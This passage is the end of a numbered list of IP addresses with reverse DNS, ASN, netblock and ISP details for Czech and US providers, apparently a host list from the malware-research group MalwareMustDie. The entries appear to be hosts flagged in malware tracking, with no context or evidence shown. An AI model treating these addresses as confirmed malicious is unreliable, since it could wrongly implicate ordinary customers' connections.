  559. 95.143.141.50|95-143-141-50.client.ltnet.cz.|196782 | 95.143.128.0/20 | LTNET | CZ | ispalliance.cz | ISP Alliance a.s.
  560. 98.102.44.38|rrcs-98-102-44-38.central.biz.rr.com.|10796 | 98.102.0.0/15 | SCRR-10796 | US | twcable.com | Time Warner Cable Internet LLC
  561. 98.102.44.38|rrcs-98-102-44-38.central.biz.rr.com.|10796 | 98.102.0.0/15 | SCRR-10796 | US | twcable.com | Time Warner Cable Internet LLC
  562. whois: asn.shadowserver.org: hostname nor servname provided, or not known
  563. 98.181.17.39|ip98-181-17-39.br.br.cox.net.|22773 | 98.181.0.0/18 | ASN-CXA-ALL-CCI-2277 | US | cox.com | Cox Communications
  564. 98.209.75.164|c-98-209-75-164.hsd1.mi.comcast.net.|7922 | 98.192.0.0/10 | COMCAST-7922 | US | comcast.net | Comcast Cable Communications Inc.
  565. 98.214.11.253|c-98-214-11-253.hsd1.il.comcast.net.|7922 | 98.192.0.0/10 | COMCAST-7922 | US | comcast.net | Comcast Cable Communications Inc.
  566.  
  567.  
  568. ## MalwareMustDie!